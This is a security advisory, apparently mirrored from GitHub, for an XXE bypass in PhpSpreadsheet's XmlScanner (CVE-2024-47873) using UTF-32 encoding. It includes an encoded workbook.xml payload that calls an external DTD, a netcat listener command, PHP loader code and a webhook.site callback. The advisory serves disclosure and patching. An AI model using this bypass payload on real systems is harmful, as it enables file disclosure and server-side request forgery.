ghsa-jw4x-v69f-hh5w
Vulnerability from github
Summary
The XmlScanner class has a scan method which should prevent XXE attacks.
However, the regexes used in the scan
method and the findCharSet method can be bypassed by using UCS-4 and encoding guessing as described in https://www.w3.org/TR/xml/#sec-guessing-no-ext-info.
Details
The scan
method converts the input in the UTF-8 encoding if it is not already in the UTF-8 encoding with the toUtf8
method.
Then, the scan
method uses a regex which would also work with 16-bit encoding.
However, the regexes from the findCharSet method, which is used for determining the current encoding can be bypassed by using an encoding which has more than 8 bits, since the regex does not expect null bytes, and the XML library will also autodetect the encoding as described in https://www.w3.org/TR/xml/#sec-guessing-no-ext-info.
A payload for the workbook.xml
file can for example be created with CyberChef&input=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPCFET0NUWVBFIG1lc3NhZ2UgWwogICAgPCFFTlRJVFkgJSBleHQgU1lTVEVNICJodHRwOi8vMTI3LjAuMC4xOjEyMzQ1L2V4dC5kdGQiPgogICAgJWV4dDsKXT4KPHdvcmtib29rIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvc3ByZWFkc2hlZXRtbC8yMDA2L21haW4iIHhtbG5zOnI9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMiPjxmaWxlVmVyc2lvbiBhcHBOYW1lPSJDYWxjIi8%2BPHdvcmtib29rUHIgYmFja3VwRmlsZT0iZmFsc2UiIHNob3dPYmplY3RzPSJhbGwiIGRhdGUxOTA0PSJmYWxzZSIvPjx3b3JrYm9va1Byb3RlY3Rpb24vPjxib29rVmlld3M%2BPHdvcmtib29rVmlldyBzaG93SG9yaXpvbnRhbFNjcm9sbD0idHJ1ZSIgc2hvd1ZlcnRpY2FsU2Nyb2xsPSJ0cnVlIiBzaG93U2hlZXRUYWJzPSJ0cnVlIiB4V2luZG93PSIwIiB5V2luZG93PSIwIiB3aW5kb3dXaWR0aD0iMTYzODQiIHdpbmRvd0hlaWdodD0iODE5MiIgdGFiUmF0aW89IjUwMCIgZmlyc3RTaGVldD0iMCIgYWN0aXZlVGFiPSIwIi8%2BPC9ib29rVmlld3M%2BPHNoZWV0cz48c2hlZXQgbmFtZT0iU2hlZXQxIiBzaGVldElkPSIxIiBzdGF0ZT0idmlzaWJsZSIgcjppZD0icklkMiIvPjwvc2hlZXRzPjxjYWxjUHIgaXRlcmF0ZUNvdW50PSIxMDAiIHJlZk1vZGU9IkExIiBpdGVyYXRlPSJmYWxzZSIgaXRlcmF0ZURlbHRhPSIwLjAwMSIvPjxleHRMc3Q%2BPGV4dCB4bWxuczpsb2V4dD0iaHR0cDovL3NjaGVtYXMubGlicmVvZmZpY2Uub3JnLyIgdXJpPSJ7NzYyNkM4NjItMkExMy0xMUU1LUIzNDUtRkVGRjgxOUNEQzlGfSI%2BPGxvZXh0OmV4dENhbGNQciBzdHJpbmdSZWZTeW50YXg9IkNhbGNBMSIvPjwvZXh0PjwvZXh0THN0Pjwvd29ya2Jvb2s%2B.).
If you open an Excel file containing the payload from the link above stored in the workbook.xml
file with PhpSpreadsheet, you will receive an HTTP request on 127.0.0.1:12345
. You can test that an HTTP request is created by running the nc -nlvp 12345
command before opening the file containing the payload with PhpSpreadsheet.
PoC
- Create a new folder.
- Run the
composer require phpoffice/phpspreadsheet
command in the new folder. - Create an
index.php
file in that folder with the following content: ```PHP <?php require 'vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Xlsx;
$spreadsheet = new Spreadsheet();
$inputFileType = 'Xlsx'; $inputFileName = './payload.xlsx';
/ Create a new Reader of the type defined in $inputFileType / $reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType); / Advise the Reader that we only want to load cell data / $reader->setReadDataOnly(true);
$worksheetData = $reader->listWorksheetInfo($inputFileName);
foreach ($worksheetData as $worksheet) {
$sheetName = $worksheet['worksheetName'];
echo "
$sheetName
"; / Load $inputFileName to a Spreadsheet Object / $reader->setLoadSheetsOnly($sheetName); $spreadsheet = $reader->load($inputFileName);$worksheet = $spreadsheet->getActiveSheet(); print_r($worksheet->toArray());
}
``
- Run the following command:
php -S 127.0.0.1:8080- Add the [payload.xlsx](https://github.com/user-attachments/files/17334157/payload.xlsx) file, which contains a payload similar to the payload from the details section, but with the URL
https://webhook.site/65744200-63d2-43a2-a6a0-cca8d6b0d50ainstead of the
http://127.0.0.1:12345/ext.dtd` URL, in the folder and open https://127.0.0.1:8080 in a browser. You will see an HTTP request on https://webhook.site/#!/view/65744200-63d2-43a2-a6a0-cca8d6b0d50a.
Impact
An attacker can bypass the sanitizer and achieve an XXE attack.
{ "affected": [ { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.29.4" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "2.0.0" }, { "fixed": "2.1.3" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "2.2.0" }, { "fixed": "2.3.2" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "3.3.0" }, { "fixed": "3.4.0" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2024-47873" ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2024-11-18T20:01:20Z", "nvd_published_at": "2024-11-18T17:15:11Z", "severity": "HIGH" }, "details": "### Summary\nThe [XmlScanner class](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a [scan](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) method which should prevent XXE attacks.\n\nHowever, the regexes used in the `scan` method and the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method can be bypassed by using UCS-4 and encoding guessing as described in \u003chttps://www.w3.org/TR/xml/#sec-guessing-no-ext-info\u003e.\n\n\n### Details\nThe `scan` method converts the input in the UTF-8 encoding if it is not already in the UTF-8 encoding with the [`toUtf8` method](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L76).\nThen, the `scan` method uses a [regex](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L79) which would also work with 16-bit encoding.\n\nHowever, the regexes from the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method, which is used for determining the current encoding can be bypassed by using an encoding which has more than 8 bits, since the regex does not expect null bytes, and the XML library will also autodetect the encoding as described in \u003chttps://www.w3.org/TR/xml/#sec-guessing-no-ext-info\u003e.\n\nA payload for the `workbook.xml` file can for example be created with [CyberChef](https://gchq.github.io/CyberChef/#recipe=Encode_text(\u0027UTF-32BE%20(12001)\u0027)\u0026input=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPCFET0NUWVBFIG1lc3NhZ2UgWwogICAgPCFFTlRJVFkgJSBleHQgU1lTVEVNICJodHRwOi8vMTI3LjAuMC4xOjEyMzQ1L2V4dC5kdGQiPgogICAgJWV4dDsKXT4KPHdvcmtib29rIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvc3ByZWFkc2hlZXRtbC8yMDA2L21haW4iIHhtbG5zOnI9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMiPjxmaWxlVmVyc2lvbiBhcHBOYW1lPSJDYWxjIi8%2BPHdvcmtib29rUHIgYmFja3VwRmlsZT0iZmFsc2UiIHNob3dPYmplY3RzPSJhbGwiIGRhdGUxOTA0PSJmYWxzZSIvPjx3b3JrYm9va1Byb3RlY3Rpb24vPjxib29rVmlld3M%2BPHdvcmtib29rVmlldyBzaG93SG9yaXpvbnRhbFNjcm9sbD0idHJ1ZSIgc2hvd1ZlcnRpY2FsU2Nyb2xsPSJ0cnVlIiBzaG93U2hlZXRUYWJzPSJ0cnVlIiB4V2luZG93PSIwIiB5V2luZG93PSIwIiB3aW5kb3dXaWR0aD0iMTYzODQiIHdpbmRvd0hlaWdodD0iODE5MiIgdGFiUmF0aW89IjUwMCIgZmlyc3RTaGVldD0iMCIgYWN0aXZlVGFiPSIwIi8%2BPC9ib29rVmlld3M%2BPHNoZWV0cz48c2hlZXQgbmFtZT0iU2hlZXQxIiBzaGVldElkPSIxIiBzdGF0ZT0idmlzaWJsZSIgcjppZD0icklkMiIvPjwvc2hlZXRzPjxjYWxjUHIgaXRlcmF0ZUNvdW50PSIxMDAiIHJlZk1vZGU9IkExIiBpdGVyYXRlPSJmYWxzZSIgaXRlcmF0ZURlbHRhPSIwLjAwMSIvPjxleHRMc3Q%2BPGV4dCB4bWxuczpsb2V4dD0iaHR0cDovL3NjaGVtYXMubGlicmVvZmZpY2Uub3JnLyIgdXJpPSJ7NzYyNkM4NjItMkExMy0xMUU1LUIzNDUtRkVGRjgxOUNEQzlGfSI%2BPGxvZXh0OmV4dENhbGNQciBzdHJpbmdSZWZTeW50YXg9IkNhbGNBMSIvPjwvZXh0PjwvZXh0THN0Pjwvd29ya2Jvb2s%2B.).\nIf you open an Excel file containing the payload from the link above stored in the `workbook.xml` file with PhpSpreadsheet, you will receive an HTTP request on `127.0.0.1:12345`. You can test that an HTTP request is created by running the `nc -nlvp 12345` command before opening the file containing the payload with PhpSpreadsheet.\n\n### PoC\n\n- Create a new folder.\n- Run the `composer require phpoffice/phpspreadsheet` command in the new folder.\n- Create an `index.php` file in that folder with the following content:\n```PHP\n\u003c?php\nrequire \u0027vendor/autoload.php\u0027;\n\nuse PhpOffice\\PhpSpreadsheet\\Spreadsheet;\nuse PhpOffice\\PhpSpreadsheet\\Writer\\Xlsx;\n\n$spreadsheet = new Spreadsheet();\n\n$inputFileType = \u0027Xlsx\u0027;\n$inputFileName = \u0027./payload.xlsx\u0027;\n\n/** Create a new Reader of the type defined in $inputFileType **/\n$reader = \\PhpOffice\\PhpSpreadsheet\\IOFactory::createReader($inputFileType);\n/** Advise the Reader that we only want to load cell data **/\n$reader-\u003esetReadDataOnly(true);\n\n$worksheetData = $reader-\u003elistWorksheetInfo($inputFileName);\n\nforeach ($worksheetData as $worksheet) {\n\n$sheetName = $worksheet[\u0027worksheetName\u0027];\n\necho \"\u003ch4\u003e$sheetName\u003c/h4\u003e\";\n/** Load $inputFileName to a Spreadsheet Object **/\n$reader-\u003esetLoadSheetsOnly($sheetName);\n$spreadsheet = $reader-\u003eload($inputFileName);\n\n$worksheet = $spreadsheet-\u003egetActiveSheet();\nprint_r($worksheet-\u003etoArray());\n\n}\n```\n- Run the following command: `php -S 127.0.0.1:8080`\n- Add the [payload.xlsx](https://github.com/user-attachments/files/17334157/payload.xlsx) file, which contains a payload similar to the payload from the details section, but with the URL `https://webhook.site/65744200-63d2-43a2-a6a0-cca8d6b0d50a` instead of the `http://127.0.0.1:12345/ext.dtd` URL, in the folder and open \u003chttps://127.0.0.1:8080\u003e in a browser. You will see an HTTP request on \u003chttps://webhook.site/#!/view/65744200-63d2-43a2-a6a0-cca8d6b0d50a\u003e.\n\n### Impact\nAn attacker can bypass the sanitizer and achieve an [XXE attack](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).\n", "id": "GHSA-jw4x-v69f-hh5w", "modified": "2024-11-18T20:01:20Z", "published": "2024-11-18T20:01:20Z", "references": [ { "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-jw4x-v69f-hh5w" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47873" }, { "type": "PACKAGE", "url": "https://github.com/PHPOffice/PhpSpreadsheet" }, { "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php" }, { "type": "WEB", "url": "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing" }, { "type": "WEB", "url": "https://www.w3.org/TR/xml/#sec-guessing-no-ext-info" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "type": "CVSS_V3" } ], "summary": "XmlScanner bypass leads to XXE" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.